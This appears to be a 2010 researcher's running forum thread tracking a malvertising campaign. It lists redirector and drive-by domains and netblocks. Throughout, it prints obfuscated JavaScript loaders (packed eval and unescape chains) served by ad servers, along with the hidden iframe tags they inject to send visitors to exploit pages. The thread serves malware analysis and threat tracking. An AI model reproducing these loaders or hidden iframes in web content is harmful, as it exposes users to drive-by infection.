eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 3M={5f:q(m,e,n){m=12.3F(m);5 R=[],M=\'\';x(5 i=0;i<m.j;i+=3){5 11=\'1\';x(5 h=0;h<3;h++){v(i+h<m.j){N=8.o(m.f(i+h))-30;v(N.j<2)N=\'0\'+N}3K 5a;11+=N}R.2t(11+\'1\')}x(5 k=0;k<R.j;k++){5 P=8.13(R[k],e,n);5 L=P.X(16);V(L.j<7)L=\'0\'+L;M+=L}M=M.3R(3P 3O(\'^+|+$\',\'g\'),\'\');b 8.2r(M)},3N:q(c,d,n){c=8.2p(c);5 G=[],U=\'\',18=\'\';x(5 i=0;i<c.j;i+=7)G.2t(c.Y(i,7));x(5 u=0;u<G.j;u++)v(G[u]==\'\')G.5b(u,1);x(5 u=0;u<G.j;u++){5 P=8.13(Z(G[u],16),d,n)+\'\';U+=P.Y(1,P.j-2)}x(5 u=0;u<U.j;u+=2)18+=8.a(Z(U.Y(u,2),10)+30);b 12.3Q(18)},o:q(a){b t.o(a)},a:q(2u){b t.a(2u)},17:q(g,l){b g-(l*58.59(g/l))},13:q(2s,14,19){5 W=1,i=0,O=2s;V((14>>i)>0){v(((14>>i)&1)==1)W=8.17((W*O),19);O=8.17((O*O),19);i++}b W},2r:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i+=2){5 I=Z(\'\'+B.f(i)+B.f(i+1),16).X(10);J+=t.a(I)}b J},2p:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i++){5 I=t.o(B.f(i)).X(16);J+=I.j==2?I:\'0\'+I}b J}};5 
t={F:{3J:{2v:2q,2B:2w,2z:2A,2y:2x,2n:2o,2e:2d,2b:2c,2a:29,2g:2f,2m:2l,2j:2k,2i:2h,2D:2C,2Y:2X,28:2W,2U:2T,31:2Z,35:36,32:34,2S:33,2I:2R,2H:2J,2E:2G,2K:2F,2Q:2L,2O:2P,2N:2M,1M:37,1r:1p,1t:1u,1q:1x,1w:1v,1C:1B,1z:1A,1y:1o,1m:1D,1f:1d,1a:1c,1e:1b,1l:1n,1k:1g,1h:1j,1s:1i,1Y:27,1X:1Z,1U:1W,20:1V,26:21,24:25,1E:22,1T:23,1J:1S,1I:1K,1F:1H,1L:1G,1Q:1R,1N:1P,2V:1O,4v:3c,38:4r,4u:4t,4p:4s,4w:4q,4A:4B,4y:4z,4n:4o,4e:4d,4b:4c,4a:49,4g:4f,4m:4l,4D:4k,4h:4j,4C:4i,4Y:4H,4X:4Z,4U:4W,51:4V,52:55,53:56,50:54,4I:4S,4T:4J,4E:4G,4K:4F,4Q:4L,4P:4R,4M:4O,4x:4N,3t:47,3s:3u,3p:3r,3v:3q,3B:3w,3z:3A,3y:3x,3n:3o,3e:3d,3b:48,3a:39,3g:3f,3m:3l,3j:3k,3i:3h,3D:3C,3Z:3Y,3W:3X,3V:3U,41:40,45:46,42:44,3T:43,3I:3S},3H:{2q:2v,2w:2B,2A:2z,2x:2y,2o:2n,2d:2e,2c:2b,29:2a,2f:2g,2l:2m,2k:2j,2h:2i,2C:2D,2X:2Y,2W:28,2T:2U,2Z:31,36:35,34:32,33:2S,2R:2I,2J:2H,2G:2E,2F:2K,2L:2Q,2P:2O,2M:2N,37:1M,1p:1r,1u:1t,1x:1q,1v:1w,1B:1C,1A:1z,1o:1y,1D:1m,1d:1f,1c:1a,1b:1e,1n:1l,1g:1k,1j:1h,1i:1s,27:1Y,1Z:1X,1W:1U,1V:20,21:26,25:24,22:1E,23:1T,1S:1J,1K:1I,1H:1F,1G:1L,1R:1Q,1P:1N,1O:2V,3c:4v,4r:38,4t:4u,4s:4p,4q:4w,4B:4A,4z:4y,4o:4n,4d:4e,4c:4b,49:4a,4f:4g,4l:4m,4k:4D,4j:4h,4i:4C,4H:4Y,4Z:4X,4W:4U,4V:51,55:52,56:53,54:50,4S:4I,4J:4T,4G:4E,4F:4K,4L:4Q,4R:4P,4O:4M,4N:4x,47:3t,3u:3s,3r:3p,3q:3v,3w:3B,3A:3z,3x:3y,3o:3n,3d:3e,48:3b,39:3a,3f:3g,3l:3m,3k:3j,3h:3i,3C:3D,3Y:3Z,3X:3W,3U:3V,40:41,46:45,44:42,43:3T,3S:3I}},o:q(a,r){r=r||\'3J\';v(!8.F[r])b 3G;a=a.5g(0);b(a 3E 8.F[r])?8.F[r][a]:a},a:q(o,r){r=r||\'3H\';v(!8.F[r])b 3G;o=(o 3E 8.F[r])?8.F[r][o]:o;b 5m.5h(o)}};5 12={w:"5l+/=",3F:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;V(i<p.j){H=t.o(p.f(i++));C=t.o(p.f(i++));D=t.o(p.f(i++));K=H>>2;E=((H&3)<<4)|(C>>4);z=((C&15)<<2)|(D>>6);y=D&5i;v(3L(C))z=y=S;3K v(3L(D))y=S;s=s+8.w.f(K)+8.w.f(E)+8.w.f(z)+8.w.f(y)}b s},3Q:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;p=p.3R(3P 
3O(\'[^A-5j-5e-9+/=]\',\'g\'),\'\');V(i<p.j){K=8.w.T(p.f(i++));E=8.w.T(p.f(i++));z=8.w.T(p.f(i++));y=8.w.T(p.f(i++));H=(K<<2)|(E>>4);C=((E&15)<<4)|(z>>2);D=((z&3)<<6)|y;s=s+t.a(H);v(z!=S)s=s+t.a(C);v(y!=S)s=s+t.a(D)}b s}};5d(3M.3N(\'57\',\'5c\',\'5k\'));',62,333,'|||||var|||this||chr|return||||charAt||||length|||||ord|input|function|dir|output|ASCII||if|alphabet|for|enc4|enc3||str|chr2|chr3|enc2|translations|decryptarray|chr1|bte|result|enc1|chunk|coded|tmpstr|basepow2|resultmod|len|asci|64|indexOf|deencrypt|while|accum|toString|substr|parseInt||tmpasci|BASE64|powmod|exp|||mod|resultd|modulus|1028|175|170|168|1031|1025|179|1169|184|180|1110|1030|1168|178|163|156|1115|1114|1105|1116|157|159|1119|158|1032|1118|162|161|1038|165|1040|1044|197|196|1043|1042|195|1045|8250|1047|200|199|1046|198|194|1041|1112|189|188|1108|8470|186|1029|190|192|193|1111|191|1109|185|1035|135|8225|8224|134|133|8230|136|8364|139|8249|1033|138|137|8240|8222|132|strhex|128|hexstr|base|push|num|1026|129|131|1107|8218|130|1027|140|1034|8211|151|150|8226|8221|149|8212|152|154|1113|8482|153|65533|148|8220|143|1039|1048|142|141|1036|144||1106|8217|147|146|8216|145|155|1050|242|1090|1089|201|240|1088|243|1091|246|1094|1093|245|244|1092|1087|239|1082|235|234|1081|1080|233|1083|236|238|1086|1085|237|1084|247|1095|in|encode|null|php2js|1103|js2php|else|isNaN|RSA|decrypt|RegExp|new|decode|replace|255|1102|250|1098|1097|249|248|1096|251|1099|1101|254|253|1100|252|232|241|211|1059|1058|210|209|1057|212|1060|1063|216|215|214|213|1061|1056|208|1052|205|202|204|203|1051|1049|1053|1079|1055|207|1054|206|1064|1062|1074|227|226|217|1072|225|1075|228|1078|231|230|1077|1076|229|224|1073|1067|220|219|1066|1065|218|1071|1068|1069|1070|223|221|222|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|Math|floor|break|splice|29819039|eval|z0|encrypt|charCodeAt|fromCharCode|63|Za|55721041|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|String'.split('|'),0,{}))
This causes two hidden iframes. The first to the trendanalytics2010.co.cc leads you to the drive by, the second just keeps stats/tabs on clients hitting the malvertising domains:
<iframe width="1" height="1" style="visibility: hidden;" src="http://trendanalytics2010.co.cc/colombo.php?n=cust1">
<iframe width="1" height="1" style="visibility: hidden;" src="http://js.zedo.com.rc1.hiskweb.com/stats_js_e.php?id=223417424">
**EDIT**
I uploaded the sample I posted to JSUnpack and it validates it. The report is as below:
http://jsunpack.jeek.org/dec/go?report=8442c03b07e2de6a49068fb3e5b1d1ae9bf7e3fa
-
Drive By:
http://hkuos.com/vd/ncdka.php - Yesterday
http://polkj.com/ch/jqpqzlq.php - Today
Redirectors:
http://ailerry.co.cc/kleopatra.php?n=cust12 - Yesterday
http://almodial.co.cc/gtrsp.php?n=cust12 - Today
-
Drive By:
http://qxitr.com/fv/_hsj.php
Redirectors:
http://chelleak.co.cc/gtrsp.php?n=cust12
-
Seeing some stuff move into a new netblock recently:
89.248.174.0/23
Malvertising servers:
view.atdmt.com.risoton.com - jsunpack report here (http://jsunpack.jeek.org/dec/go?report=be928c863aaeb55d18563f9016300d3d2dfe9fa9)
view.ads.cheratic.com
view.atdmt.com.tessane.com
Redirector:
http://benzele.co.cc/jakomo.php?n=cust1
The driveby/exploit domains remain within the 194.8.250.0/24 netblock.
-
More domains active in the malvertising netblock:
media.fastclick.net.timoton.com
Haven't seen the hidden iframes inside of this obfuscated JavaScript; it will probably be switched on at a later date given the netblock it lives in. Also MSN/Live.com are currently using this advertising service.
**EDIT**
And its already swapped over to redirecting to drivebys:
http://jsunpack.jeek.org/dec/go?report=8f1e9fa5b9651e1fdb135997cd15f0d8ec42a014
http://mildron.co.cc/jiqasdir.php?n=cust11
http://jgtee.com/ww/wnuajoz.php
-
URLs are changing up slightly today:
http://statpc.in/x/?src=sftmaster2&id=av1&o=o
Net has moved for the drive by's as well, to another already known bad actor:
91.188.59.55
http://www.db.ripe.net/whois?form_type=simple&full_query_string=&searchtext=91.188.59.55
Different drive by style site as well, this is more of a scanner page.
-
http://tosoft.in/x/?src=sftmaster2&id=av5&o=o
http://resolvenews.in/x/?src=sftmaster2&id=av5&o=o
-
facilitatedigital.net
For the last day or so people logging into mail.live.com, menshealth.com and a bunch of others have been getting malvertising redirecting them to drive by sites. However, they have been flipping the switch on and off for redirecting to the drive bys.
Example URL that serves up obfuscated javascript that does not contain the drive by:
http://facilitatedigital.net/rc/js/ld/?fn=11a&sid=1112535&dpn=75zh1&fp=n&ctp=y9i12
Response:
HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Thu, 05 Aug 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 1087
var MPvpZm=new String('evafeds'.substr(0,3)+'bruller'.substr(3,1));var GsZiFN=thi
s;var kkMsoVj=GsZiFN [MPvpZm];var oxdh=new String('unescape');var ugoi=GsZiFN [ox
dh];var HIhVN='6J/6JA6Jn6Qk6JR6Jk6J16Q/6a16QQ6Qa6JU6Q/6Jk6aM6Qk6J16Jk6Qn6Jn6J_6Q9
6Jk6aM6aa6ak6nn6/n6J_6a96JM6Qa6Jk6JJ6nR6aQ6JM6Q/6Q/6Q96ak6nn6/_6ak6na6/J6ak6na6/J
6QQ6QQ6QQ6a16JJ6JG6JU6JQ6JM6Q/6J16Jk6Q/6QQ6JA6Qa6Jl6a16Jn6JA6JR6ak6na6/J6aQ6a96Q/
6J_6Qa6JQ6Jk6Q/6nR6aQ6kA6Ja6JG6J_6J16Jl6aQ6ak6nn6/k6ak6nn6/n6JU6JR6JQ6a96Qn6Qa6Jn
6nR6aQ6JM6Q/6Q/6Q96nP6aA6aA6JJ6J_6Jn6JU6JG6JU6Q/6J_6Q/6Jk6J/6JU6JQ6JU6Q/6J_6JG6a1
6J16Jk6Q/6aA6Ja6J/6Ja6aA6/J6JG6JU6JQ6JM6Q/6/16Jk6Q/6aA6n_6nJ6n96QM6nJ6n96n96kA6n9
6n/6a16JP6Q96JQ6aQ6a96Ja6JA6Qa6J/6Jk6Qa6nR6aQ6n96aQ6a96ak6nn6/k6ak6nn6/n6aA6J_6ak
6nn6/k6aa6aU6aU6nl69P69P69P';var _Mge='WXfmR9Fs6OV3DTZ4QyYcL-G=txvz_ajw207.EN?&JH
MdKUk5PB:8Ai/luIop%CS1benrhqg';var XOy='F8LSEUA3JzbnRio/0HBe.&jdKO%Wr:cxa9Qp1ut-D
ysgT=IkmlZMPV7Y4v?26Gh_CwX5qfN';var cYS='';var _eTy;var irIk;for(_eTy=0;_eTy<HIhV
N.length;_eTy++){ irIk=XOy.indexOf(HIhVN.charAt(_eTy));if(irIk>-1){ cYS+=_Mge.cha
rAt(irIk);}}kkMsoVj(ugoi(cYS));
Then some of the advertising servers in the same netblock (media.topsann.com) will *sometimes* serve up the obfuscated JavaScript that redirects to the drive by:
JSUnpack report: http://jsunpack.jeek.org/dec/go?report=812b87a1ed2c803ceb6b81671f99107280d2d241
URL: http://media.topsann.com/ad/js/ld/?chn=22a&bfx=16tz516&sid=176552&zed=81963&fl=no&rtr=y
Response:
HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Fri, 06 Aug 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 3652
var bibak=new String('evafeds'.substr(0,3)+'bruller'.substr(3,1));var Thhx=this;v
ar EDTmvV=Thhx [bibak];var sxMKjk=new String('unescape');var Uzym=Thhx [sxMKjk];v
ar Hz_c='TjBTZ8TZsTX=TZsTX/TX8TZsTXUTXyTvjT8UTvjTvATXcTXWTZZTvjTssTX=TZsTXWTvATXc
TXWTZZTvjTssTX=TZsTXWTvATv/TvcTXZTXWTZsTsXTZWTXyTXyTW/TXWTX=TZvTvATv/TvyTvjT8jTvy
TvjT8=TvyTvjT8jTvyTvjT8jTvyTvjT8jTvyTvjT8jTv/TvjTvUTvjTXcTXWTZZTvjTssTX=TZsTXWTvA
TXcTXWTZZTvjTssTX=TZsTXWTvATXcTXWTZZTvjTssTX=TZsTXWTvATv/TvcTXZTXWTZsTsXTZWTXyTXy
TW/TXWTX=TZvTvATv/TvyTvjT8jTvyTvjT8=TvyTvjT8jTvyTvjT8jTvyTvjT8jTvyTvjT8jTv/TvcTZs
TXpTsZTsUTWsTW8TZsTZvTX/TXcTXZTvATv/TvcTZ8TZWTXvTZ8TZsTZvTX/TXcTXZTvAT8jTvyTvjTXc
TXWTZZTvjTssTX=TZsTXWTvATXcTXWTZZTvjTssTX=TZsTXWTvATv/TvcTXZTXWTZsTsXTZWTXyTXyTW/
TXWTX=TZvTvATv/TvyTvjT8jTvyTvjT8=TvyTvjT8jTvyTvjT8jTvyTvjT8jTvyTvjT8jTv/TvcTZsTXp
TsZTsUTWsTW8TZsTZvTX/TXcTXZTvATv/TvcTXyTX=TZ8TZsTs/TXcTXsTXWTZATspTXXTvATvvTvjTvv
Tv/TvUT8=Tv/Tv/Tv/TvjTvpTvjTvAT8=T8jT8jT8jTvjTvBTvjT8XT8jTvjTvBTvjT8XT8jTv/T8nTjB
TjBTZXTX=TZvTvjTX=TXyTXyTWpTZsTvjT8UTvjTvvTvvT8nTjBTZXTX=TZvTvjTXUTZsTX8TXATvjT8U
TvjTX=TXyTXyTWpTZsTvcTXUTX=TZsTX8TXATvATZ8TZsTX=TZsTX/TX8TZsTXUTXyTv/T8nTjBTjBTjB
TjBTX/TXXTvjTvATvjTXUTZsTX8TXATvjTv=T8UTvjTXcTZWTXyTXyTvjTv/TvjTZnTjBTXsTXpTX8TZW
TXUTXWTXcTZsTvcTZZTZvTX/TZsTXWTvATZWTXcTXWTZ8TX8TX=TZjTXWTvATvvTvWT88Ts8TX/TXXTZv
TX=TXUTXWTvjTZ8TZvTX8T8UTvZTXATZsTZsTZjT8BTvpTvpTXUTXWTXsTX/TX=TvcTZsTXpTZjTZ8TX=
TXcTXcTvcTX8TXpTXUTvpTZ8TZsTX=TZsTZ8TWpTZsTvcTZjTXATZjT8pTX/TXsT8UT8=T8ZT8XT8WT8W
T8vTvXTZ8T8UT8jTvXTXWT8UT8=TvZTvjTZ8TZsTZ/TXyTXWT8UTvZTZXTX/TZ8TX/TXvTX/TXyTX/TZs
TZ/T8BTXATX/TXsTXsTXWTXcT8nTvZTvjTZZTX/TXsTZsTXAT8UTvZT8jTvZTvjTXATXWTX/TXZTXATZs
T8UTvZT8jTvZTvjTvjTvWT88TsWTvWT88Ts8TvpTX/TXXTZvTX=TXUTXWTvWT88TsWTvvTv/Tv/T8nTjB
TZUTvjTvjTXWTXyTZ8TXWTvjTvjTZnTjBTjBTj/Tj/TjBTXsTXpTX8TZWTXUTXWTXcTZsTvcTZZTZvTX/
TZsTXWTvATZWTXcTXWTZ8TX8TX=TZjTXWTvATvvTvWT88Ts8TX/TXXTZvTX=TXUTXWTvjTZ8TZvTX8T8U
TvZTXATZsTZsTZjT8BTvpTvpTXUTXWTZ8TXpTXUTXpTZsTvcTX8TXpTvcTX8TX8TvpTZvTX8TZvTXsTX8
TZATvcTZjTXATZjT8pTXZTXBT8UTX8TZWTZ8TZsT8=T8vTvZTvjTZ8TZsTZ/TXyTXWT8UTvZTZXTX/TZ8
TX/TXvTX/TXyTX/TZsTZ/T8BTXATX/TXsTXsTXWTXcT8nTvZTvjTZZTX/TXsTZsTXAT8UTvZT8=TvZTvj
TXATXWTX/TXZTXATZsT8UTvZT8=TvZTvjTvWT88TsWTvWT88Ts8TvpTX/TXXTZvTX=TXUTXWTvWT88TsW
TvvTv/Tv/T8nTvjTjBTjBTXsTXpTX8TZWTXUTXWTXcTZsTvcTZZTZvTX/TZsTXWTvATZWTXcTXWTZ8TX8
TX=TZjTXWTvATvvTvWT88Ts8TX/TXXTZvTX=TXUTXWTvjTZ8TZvTX8T8UTvZTXATZsTZsTZjT8BTvpTvp
TXUTXWTXsTX/TX=TvcTZsTXpTZjTZ8TX=TXcTXcTvcTX8TXpTXUTvpTZ8TZsTX=TZsTZ8TWpTXBTZ8TWp
TXWTvcTZjTXATZjT8pTX/TXsT8UT8=T8ZT8XT8WT8WT8vTvZTvjTZ8TZsTZ/TXyTXWT8UTvZTZXTX/TZ8
TX/TXvTX/TXyTX/TZsTZ/T8BTXATX/TXsTXsTXWTXcT8nTvZTvjTZZTX/TXsTZsTXAT8UTvZT8=TvZTvj
TXATXWTX/TXZTXATZsT8UTvZT8=TvZTvjTvWT88TsWTvWT88Ts8TvpTX/TXXTZvTX=TXUTXWTvWT88TsW
TvvTv/Tv/T8nTjBTjBTjBTZUTjBTjBTXsTXpTX8TZWTXUTXWTXcTZsTvcTZZTZvTX/TZsTXWTvATZWTXc
TXWTZ8TX8TX=TZjTXWTvATvvTvWT88Ts8TX=TvjTXATZvTXWTXXT8UTvZTXATZsTZsTZjTvWT88Ts=TvW
T8vTsXTvWT8vTsXTZZTZZTZZTvcTXvTX/TXZTX8TXpTXUTXUTXWTZvTX8TXWTvcTX8TXpTXUTvWT8vTsX
TvWT88TsXTXATZvTXWTXXTvWT88TssT8ZTXsTXUTvUT8=TvZTvjTZsTX=TZvTXZTXWTZsT8UTvZTWpTXv
TXyTX=TXcTXnTvZTvWT88TsWTvWT88Ts8TX/TXUTXZTvjTZ8TZvTX8T8UTvZTXATZsTZsTZjT8BTvpTvp
TXUTXWTXsTX/TX=TvcTZsTXpTZjTZ8TX=TXcTXcTvcTX8TXpTXUTvpTXvTXsTXvTvpTX=TsvTX/TXZTs8
TXpTXUTXUTXWTZvTX8TXWTvpT8ZT8vT8ATZAT8/T8jTZ8TZsTX=TZsTvcTXZTX/TXXTvZTvjTXvTXpTZv
TXsTXWTZvT8UTvZT8jTvZTvjTvWT88TsWTvWT88Ts8TvpTX=TvWT88TsWTvvTv/Tv/T8nTjBTjBTjB';v
ar DpdNZ='mEeYnB0osA1-6SC:raMQ=XFyK/5&PpD_I2xLH3OZjqJwb4dV9RWfgv.l7ktiuzhNc%T?G8U
';var t_H='3caPmnjI6B=JX0yOVCS-9op5u_Wf1iUY.v2%K8MxlE7hDs:?/wQ4LtHqZFGd&NbReTkgzA
r';var rSE='';var Jnox;var t_dIH;for(Jnox=0;Jnox<Hz_c.length;Jnox++){ t_dIH=t_H.i
ndexOf(Hz_c.charAt(Jnox));if(t_dIH>-1){ rSE+=DpdNZ.charAt(t_dIH);}}EDTmvV(Uzym(rS
E));
This causes a hidden iframe to be written that causes the client to hit a redirect to a driveby:
<iframe src='http://mesomot.co.cc/rcrdcx.php?gj=cust12' style='visibility:hidden;' width='1' height='1' ></iframe><iframe src='http://media.topsann.com/stats_js_e.php?id=176552' style='visibility:hidden;' width='1' height='1' ></iframe>
The co.cc domain redirects then to the actual driveby located here:
http://uyyty.com/qu/sjmba.php
This drive by is again single shot and subsequent visits to it will not serve up exploits, it will usually just redirect to google.com.